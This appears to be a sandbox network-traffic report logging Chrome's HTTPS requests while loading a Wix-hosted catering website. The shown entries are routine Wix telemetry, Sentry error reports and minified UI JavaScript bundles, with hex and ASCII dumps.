                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC927OUTData Raw: 7b 22 64 74 22 3a 31 32 37 2c 22 65 22 3a 5b 7b 22 64 74 22 3a 31 32 37 2c 22 66 22 3a 7b 22 5f 62 72 61 6e 64 49 64 22 3a 22 77 69 78 22 2c 22 5f 6d 73 22 3a 33 34 35 32 39 2c 22 5f 68 6f 73 74 69 6e 67 50 6c 61 74 66 6f 72 6d 22 3a 22 56 49 45 57 45 52 22 2c 22 73 72 63 22 3a 37 32 2c 22 65 76 69 64 22 3a 31 38 33 2c 22 70 6c 61 74 66 6f 72 6d 22 3a 22 76 69 65 77 65 72 22 2c 22 73 65 73 73 69 6f 6e 49 64 22 3a 22 36 30 39 66 30 34 34 31 2d 32 64 38 63 2d 34 36 34 36 2d 38 34 36 65 2d 32 37 38 62 35 34 61 38 66 35 31 39 22 2c 22 6d 73 69 64 22 3a 22 38 66 63 31 31 33 38 63 2d 37 39 62 34 2d 34 65 32 39 2d 62 62 63 30 2d 64 35 35 31 63 36 63 61 37 31 61 66 22 2c 22 76 73 69 22 3a 22 34 64 36 66 38 38 39 61 2d 64 37 35 64 2d 34 32 31 36 2d 61 32 35 65 2d
                                                                                                                                                                                                                        Data Ascii: {"dt":127,"e":[{"dt":127,"f":{"_brandId":"wix","_ms":34529,"_hostingPlatform":"VIEWER","src":72,"evid":183,"platform":"viewer","sessionId":"609f0441-2d8c-4646-846e-278b54a8f519","msid":"8fc1138c-79b4-4e29-bbc0-d551c6ca71af","vsi":"4d6f889a-d75d-4216-a25e-
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC388INHTTP/1.1 204 No Content
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:09 GMT
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: Accept,Authorization,Cache-Control,Content-Type,DNT,If-Modified-Since,Keep-Alive,Origin,User-Agent,X-Requested-With


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        104192.168.2.55003744.195.212.924435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC710OUTPOST /api/68/envelope/?sentry_key=605a7baede844d278b89dc95ae0a9123&sentry_version=7 HTTP/1.1
                                                                                                                                                                                                                        Host: sentry-next.wixpress.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        Content-Length: 138
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Origin: https://www.samantacatering.com
                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Referer: https://www.samantacatering.com/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC138OUTData Raw: 7b 7d 0a 7b 22 74 79 70 65 22 3a 22 63 6c 69 65 6e 74 5f 72 65 70 6f 72 74 22 7d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 36 35 31 37 31 38 37 2e 39 36 39 2c 22 64 69 73 63 61 72 64 65 64 5f 65 76 65 6e 74 73 22 3a 5b 7b 22 72 65 61 73 6f 6e 22 3a 22 65 76 65 6e 74 5f 70 72 6f 63 65 73 73 6f 72 22 2c 22 63 61 74 65 67 6f 72 79 22 3a 22 65 72 72 6f 72 22 2c 22 71 75 61 6e 74 69 74 79 22 3a 31 7d 5d 7d
                                                                                                                                                                                                                        Data Ascii: {}{"type":"client_report"}{"timestamp":1736517187.969,"discarded_events":[{"reason":"event_processor","category":"error","quantity":1}]}
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC306INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:53:09 GMT
                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                        Content-Length: 2
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Server: nginx/1.13.7
                                                                                                                                                                                                                        access-control-allow-origin: https://www.samantacatering.com
                                                                                                                                                                                                                        access-control-expose-headers: x-sentry-error, retry-after, x-sentry-rate-limits
                                                                                                                                                                                                                        vary: Origin
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC2INData Raw: 7b 7d
                                                                                                                                                                                                                        Data Ascii: {}


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        105192.168.2.55004034.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC457OUTGET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_bootstrap-classic.73963ac7.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1162INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Content-Length: 65196
                                                                                                                                                                                                                        X-Amz-Replication-Status: PENDING
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: B7govMAc84fKseiCBqgCN8YsSk.lG8HL
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Varnish: 970554116 1046688347
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0),1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: false
                                                                                                                                                                                                                        X-Varnish: 202347132
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        X-Cluster-Node-Role: proxy
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Date: Wed, 01 Jan 2025 10:05:59 GMT
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        Age: 791230
                                                                                                                                                                                                                        Last-Modified: Wed, 01 Jan 2025 10:03:24 GMT
                                                                                                                                                                                                                        ETag: "23bc9398fe583a0ff53597e69d064a5f"
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        x-cache: hit
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC228INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 62 6f 6f 74 73 74 72 61 70 2d 63 6c 61 73 73 69 63 22 2c 5b 22 72 65 61 63 74 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f
                                                                                                                                                                                                                        Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_bootstrap-classic",["react"],t):"object"==typeof exports?expo
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 72 74 73 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 62 6f 6f 74 73 74 72 61 70 2d 63 6c 61 73 73 69 63 22 5d 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 65 5b 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 62 6f 6f 74 73 74 72 61 70 2d 63 6c 61 73 73 69 63 22 5d 3d 74 28 65 2e 52 65 61 63 74 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 7b 39 36 31 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6e 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d
                                                                                                                                                                                                                        Data Ascii: rts["rb_wixui.thunderbolt_bootstrap-classic"]=t(require("react")):e["rb_wixui.thunderbolt_bootstrap-classic"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={96114:function(e,t,a){var n;!function(t){"use strict";var i=
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 61 20 69 6e 20 74 29 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 29 26 26 28 65 5b 61 5d 3d 74 5b 61 5d 29 7d 28 74 2c 65 29 2c 74 2e 66 61 73 74 64 6f 6d 3d 74 68 69 73 2c 74 2e 69 6e 69 74 69 61 6c 69 7a 65 26 26 74 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 2c 74 7d 2c 63 61 74 63 68 3a 6e 75 6c 6c 7d 3b 76 61 72 20 64 3d 74 2e 66 61 73 74 64 6f 6d 3d 74 2e 66 61 73 74 64 6f 6d 7c 7c 6e 65 77 20 6f 3b 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 7d 2e 63 61 6c 6c 28 64 2c 61 2c 64 2c 65 29 29 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 6e 29 7d 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 76 6f 69
                                                                                                                                                                                                                        Data Ascii: on(e,t){for(var a in t)t.hasOwnProperty(a)&&(e[a]=t[a])}(t,e),t.fastdom=this,t.initialize&&t.initialize(),t},catch:null};var d=t.fastdom=t.fastdom||new o;void 0===(n=function(){return d}.call(d,a,d,e))||(e.exports=n)}("undefined"!=typeof window?window:voi
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 6e 2e 64 28 65 2c 7b 53 54 41 54 49 43 5f 4d 45 44 49 41 5f 55 52 4c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 74 7d 2c 70 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 74 7d 7d 29 3b 76 61 72 20 74 3d 6e 28 34 34 38 29 2c 61 3d 6e 2e 6e 28 74 29 2c 72 3d 6e 28 35 33 32 39 29 2c 6f 3d 6e 2e 6e 28 72 29 3b 63 6f 6e 73 74 20 73 3d 31 33 2c 63 3d 32 37 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 20 74 3d 3e 7b 74 2e 6b 65 79 43 6f 64 65 3d 3d 3d 65 26 26 28 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 74 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2e 63 6c 69 63 6b 28 29 29 7d 7d 63 6f 6e 73 74 20 64 3d 6c 28 33 32 29 2c 75 3d 6c 28 73
                                                                                                                                                                                                                        Data Ascii: n.d(e,{STATIC_MEDIA_URL:function(){return Ut},ph:function(){return Bt}});var t=n(448),a=n.n(t),r=n(5329),o=n.n(r);const s=13,c=27;function l(e){return t=>{t.keyCode===e&&(t.preventDefault(),t.stopPropagation(),t.currentTarget.click())}}const d=l(32),u=l(s
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 65 79 44 6f 77 6e 3a 44 2c 22 61 72 69 61 2d 6c 69 76 65 22 3a 4d 2c 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 3a 6b 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 4e 2c 22 61 72 69 61 2d 6c 61 62 65 6c 6c 65 64 62 79 22 3a 4f 2c 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 3a 52 2c 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 3a 50 2c 22 61 72 69 61 2d 68 61 73 70 6f 70 75 70 22 3a 78 2c 22 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 22 3a 53 2c 22 61 72 69 61 2d 63 75 72 72 65 6e 74 22 3a 46 2c 74 69 74 6c 65 3a 54 2c 6f 6e 43 6c 69 63 6b 3a 76 2c 6f 6e 4d 6f 75 73 65 45 6e 74 65 72 3a 4c 2c 6f 6e 4d 6f 75 73 65 4c 65 61 76 65 3a 79 2c 6f 6e 44 6f 75 62 6c 65 43 6c 69 63 6b 3a 62 2c 6f 6e 46 6f 63 75 73 3a 77 2c 6f 6e 46 6f 63 75 73 43 61 70 74 75 72 65
                                                                                                                                                                                                                        Data Ascii: eyDown:D,"aria-live":M,"aria-disabled":k,"aria-label":N,"aria-labelledby":O,"aria-pressed":R,"aria-expanded":P,"aria-haspopup":x,"aria-describedby":S,"aria-current":F,title:T,onClick:v,onMouseEnter:L,onMouseLeave:y,onDoubleClick:b,onFocus:w,onFocusCapture
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 5d 26 26 6e 75 6c 6c 21 3d 3d 69 5b 65 5d 7c 7c 64 65 6c 65 74 65 20 69 5b 65 5d 7d 29 29 2c 69 7d 29 28 7b 2e 2e 2e 4f 2c 2e 2e 2e 52 2c 64 69 73 61 62 6c 65 64 3a 6e 75 6c 6c 21 3d 28 61 3d 52 2e 64 69 73 61 62 6c 65 64 29 3f 61 3a 50 2c 6c 61 62 65 6c 3a 6e 75 6c 6c 21 3d 28 6e 3d 6e 75 6c 6c 21 3d 28 69 3d 6e 75 6c 6c 3d 3d 4f 3f 76 6f 69 64 20 30 3a 4f 2e 6c 61 62 65 6c 29 3f 69 3a 52 2e 6c 61 62 65 6c 29 3f 6e 3a 45 7d 29 2c 47 3d 28 28 65 2c 74 2c 61 2c 6e 29 3d 3e 61 3f 2d 31 3a 65 3d 3d 3d 62 2e 42 75 74 74 6f 6e 3f 6e 3a 79 28 65 2c 74 29 3f 6e 75 6c 6c 21 3d 6e 3f 6e 3a 30 3a 6e 29 28 53 2c 67 2c 50 2c 78 29 2c 42 3d 28 28 65 2c 74 2c 61 29 3d 3e 79 28 65 2c 74 29 7c 7c 77 28 65 2c 61 29 3f 22 62 75 74 74 6f 6e 22 3a 76 6f 69 64 20 30 29 28 53
                                                                                                                                                                                                                        Data Ascii: ]&&null!==i[e]||delete i[e]})),i})({...O,...R,disabled:null!=(a=R.disabled)?a:P,label:null!=(n=null!=(i=null==O?void 0:O.label)?i:R.label)?n:E}),G=((e,t,a,n)=>a?-1:e===b.Button?n:y(e,t)?null!=n?n:0:n)(S,g,P,x),B=((e,t,a)=>y(e,t)||w(e,a)?"button":void 0)(S
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 70 73 3a 72 2c 63 6c 61 73 73 4e 61 6d 65 3a 73 2c 63 68 69 6c 64 72 65 6e 3a 63 2c 61 75 74 6f 46 6f 63 75 73 3a 6c 2c 6f 6e 42 6c 75 72 3a 64 2c 6f 6e 46 6f 63 75 73 3a 75 2c 64 69 73 61 62 6c 65 64 3a 6d 7d 3d 65 3b 63 6f 6e 73 74 20 67 3d 6f 28 29 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 6f 28 29 2e 75 73 65 49 6d 70 65 72 61 74 69 76 65 48 61 6e 64 6c 65 28 74 2c 28 28 29 3d 3e 28 7b 66 6f 63 75 73 3a 28 29 3d 3e 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 65 3d 67 2e 63 75 72 72 65 6e 74 29 3f 76 6f 69 64 20 30 3a 65 2e 66 6f 63 75 73 28 29 7d 2c 62 6c 75 72 3a 28 29 3d 3e 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 65 3d 67 2e 63 75 72 72 65 6e 74 29 3f 76 6f 69 64 20 30 3a 65 2e 62 6c 75 72 28 29 7d 7d 29 29
                                                                                                                                                                                                                        Data Ascii: ps:r,className:s,children:c,autoFocus:l,onBlur:d,onFocus:u,disabled:m}=e;const g=o().useRef(null);o().useImperativeHandle(t,(()=>({focus:()=>{var e;return null==(e=g.current)?void 0:e.focus()},blur:()=>{var e;return null==(e=g.current)?void 0:e.blur()}}))
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 74 20 69 3d 28 65 3d 3e 28 7b 2e 2e 2e 65 2c 75 70 64 61 74 65 53 74 79 6c 65 73 3a 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 29 2e 72 65 64 75 63 65 28 28 28 65 2c 5b 74 2c 61 5d 29 3d 3e 7b 72 65 74 75 72 6e 7b 2e 2e 2e 65 2c 5b 28 6e 3d 74 2c 6e 2e 73 74 61 72 74 73 57 69 74 68 28 22 2d 2d 22 29 3f 74 3a 59 28 74 29 29 5d 3a 76 6f 69 64 20 30 3d 3d 3d 61 3f 6e 75 6c 6c 3a 61 7d 3b 76 61 72 20 6e 7d 29 2c 7b 7d 29 3b 65 2e 75 70 64 61 74 65 53 74 79 6c 65 73 28 61 29 7d 7d 29 29 28 6e 29 3b 72 65 74 75 72 6e 20 65 28 7b 6d 61 70 70 65 72 50 72 6f 70 73 3a 74 2c 73 74 61 74 65 56 61 6c 75 65 73 3a 61 2c 63 6f 6e 74 72 6f 6c 6c 65 72 55 74 69 6c 73 3a 69 7d 29 7d 7d 29 2c 7a 3d 65 3d 3e 22 6c 69 6e 6b 50 6f 70 75
                                                                                                                                                                                                                        Data Ascii: t i=(e=>({...e,updateStyles:t=>{const a=Object.entries(t).reduce(((e,[t,a])=>{return{...e,[(n=t,n.startsWith("--")?t:Y(t))]:void 0===a?null:a};var n}),{});e.updateStyles(a)}}))(n);return e({mapperProps:t,stateValues:a,controllerUtils:i})}}),z=e=>"linkPopu
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 61 76 69 67 61 74 6f 72 2e 6c 61 6e 67 75 61 67 65 2c 75 72 6c 3a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 64 65 74 61 69 6c 73 3a 6d 2c 65 6c 65 6d 65 6e 74 54 79 70 65 3a 73 3f 3f 22 55 6e 6b 6e 6f 77 6e 22 2c 61 63 74 69 6f 6e 4e 61 6d 65 3a 6f 3f 3f 6a 28 6e 29 2c 76 61 6c 75 65 3a 69 3f 3f 57 28 6e 2c 75 29 7d 7d 2c 7b 65 6e 64 70 6f 69 6e 74 3a 22 70 61 22 2c 2e 2e 2e 61 7d 29 7d 3b 76 61 72 20 5a 3b 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 54 65 78 74 3d 22 54 65 78 74 22 2c 65 2e 4d 65 6e 75 3d 22 4d 65 6e 75 22 2c 65 2e 49 6d 61 67 65 3d 22 49 6d 61 67 65 22 2c 65 2e 49 6e 70 75 74 3d 22 49 6e 70 75 74 22 2c 65 2e 4c 6f 67 69 6e 3d 22 4c 6f 67 69 6e 22 2c 65 2e 42 75 74 74 6f 6e 3d 22 42 75 74 74 6f 6e 22 2c 65 2e 53 6f
                                                                                                                                                                                                                        Data Ascii: avigator.language,url:window.location.href,details:m,elementType:s??"Unknown",actionName:o??j(n),value:i??W(n,u)}},{endpoint:"pa",...a})};var Z;!function(e){e.Text="Text",e.Menu="Menu",e.Image="Image",e.Input="Input",e.Login="Login",e.Button="Button",e.So
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1390INData Raw: 72 20 61 65 3d 22 48 6c 52 7a 35 65 22 3b 63 6f 6e 73 74 20 6e 65 3d 22 76 31 22 2c 69 65 3d 32 2c 72 65 3d 31 39 32 30 2c 6f 65 3d 31 39 32 30 2c 73 65 3d 31 65 33 2c 63 65 3d 31 65 33 2c 6c 65 3d 7b 53 43 41 4c 45 5f 54 4f 5f 46 49 4c 4c 3a 22 66 69 6c 6c 22 2c 53 43 41 4c 45 5f 54 4f 5f 46 49 54 3a 22 66 69 74 22 2c 53 54 52 45 54 43 48 3a 22 73 74 72 65 74 63 68 22 2c 4f 52 49 47 49 4e 41 4c 5f 53 49 5a 45 3a 22 6f 72 69 67 69 6e 61 6c 5f 73 69 7a 65 22 2c 54 49 4c 45 3a 22 74 69 6c 65 22 2c 54 49 4c 45 5f 48 4f 52 49 5a 4f 4e 54 41 4c 3a 22 74 69 6c 65 5f 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 54 49 4c 45 5f 56 45 52 54 49 43 41 4c 3a 22 74 69 6c 65 5f 76 65 72 74 69 63 61 6c 22 2c 46 49 54 5f 41 4e 44 5f 54 49 4c 45 3a 22 66 69 74 5f 61 6e 64 5f 74 69
                                                                                                                                                                                                                        Data Ascii: r ae="HlRz5e";const ne="v1",ie=2,re=1920,oe=1920,se=1e3,ce=1e3,le={SCALE_TO_FILL:"fill",SCALE_TO_FIT:"fit",STRETCH:"stretch",ORIGINAL_SIZE:"original_size",TILE:"tile",TILE_HORIZONTAL:"tile_horizontal",TILE_VERTICAL:"tile_vertical",FIT_AND_TILE:"fit_and_ti


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        106192.168.2.55004234.49.229.814435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC444OUTGET /services/editor-elements-library/dist/thunderbolt/rb_wixui.thunderbolt_menu.647b0eb4.bundle.min.js HTTP/1.1
                                                                                                                                                                                                                        Host: static.parastorage.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC1114INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 10:45:41 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Content-Length: 98646
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Amz-Replication-Status: COMPLETED
                                                                                                                                                                                                                        Last-Modified: Thu, 09 Jan 2025 10:40:47 GMT
                                                                                                                                                                                                                        ETag: "52af04fefa6dec50032624da0190cffe"
                                                                                                                                                                                                                        X-Amz-Server-Side-Encryption: AES256
                                                                                                                                                                                                                        X-Amz-Version-Id: CvYGKkI6JEqH_q7D1OSSTcMzV880uOXA
                                                                                                                                                                                                                        Server: Pepyaka/1.21.6
                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                        Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-*
                                                                                                                                                                                                                        Timing-Allow-Origin: *
                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                        X-Cluster-Self-Is-Next: true
                                                                                                                                                                                                                        X-Varnish: 183897660 517511533
                                                                                                                                                                                                                        Age: 97647
                                                                                                                                                                                                                        X-Cache-Status: HIT
                                                                                                                                                                                                                        X-Seen-By: aVxMblM8KFG3we5NLvyVcxMNgXS7J8yrt3GwAgEfDyVn+PxHDBkh4V2x50EyEnEQ
                                                                                                                                                                                                                        Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                                                        X-Cluster-Node-Role: serve
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Via: 1.1 varnish (Varnish/6.0), 1.1 google
                                                                                                                                                                                                                        x-cache: miss
                                                                                                                                                                                                                        glb-x-seen-by: qhk2IXhXaFW+ScoHjRxEUvX1Zxk6j9wOS6tQMkUbOP0=
                                                                                                                                                                                                                        x-gcp-cdn-pop: LGA-12baf686
                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        2025-01-10 13:53:09 UTC276INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 72 65 71 75 69 72 65 28 22 72 65 61 63 74 22 29 2c 72 65 71 75 69 72 65 28 22 72 65 61 63 74 2d 64 6f 6d 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 72 62 5f 77 69 78 75 69 2e 74 68 75 6e 64 65 72 62 6f 6c 74 5f 6d 65 6e 75 22 2c 5b 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 44 4f 4d 22 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 72 62 5f
                                                                                                                                                                                                                        Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react"),require("react-dom")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_menu",["react","reactDOM"],t):"object"==typeof exports?exports["rb_
